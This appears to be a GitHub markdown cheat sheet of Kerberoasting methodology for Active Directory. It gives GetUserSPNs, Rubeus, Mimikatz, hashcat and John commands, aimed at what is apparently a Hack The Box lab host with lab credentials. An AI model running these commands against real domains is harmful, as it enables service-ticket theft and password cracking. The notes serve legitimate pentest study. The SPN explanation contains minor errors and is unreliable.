Skip to content

Latest commit

 

History

History
31 lines (17 loc) · 1.47 KB

ActiveDirectoryMethodology.md

File metadata and controls

31 lines (17 loc) · 1.47 KB

A.D. Methodology

  1. GetUserSPNs.ps1 or GetUserSPNs.py

    python3 GetUserSPNs.py active.htb/svc_tgs:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100

  2. Get Service Tickets

    PS> .\Rubeus.exe kerberoast /simple /outfile:hashes.txt

  3. Extract Tickets

    Mimikatz kerberos::list /export

  4. Crack Tickets

    HashCat: hashcat -m 13100 --force <TGSs_file> <passwords_file>

    JohnTheRipper: john --format=krb5tgs --wordlist=<passwords_file> <ticket_file>

Resources

HackTricks

Forge Service Tickets (TGS) with Kerberoasting MITRE ATT&CK ID: T1558.003

Kerberoasting 101

GhostPack tools

Service Principal Names (SPNs)

The structure of an SPN consists of three (3) main parts: Service Class: the service type, i.e., SQL, Web, Exchange, File, etc., and the Host where the service is usually running in the format of FQDN (Fully Qualified Domain Name)and port number. For example, below, the Microsoft SQL service runs on the dcorp-mgmt host on port 1443.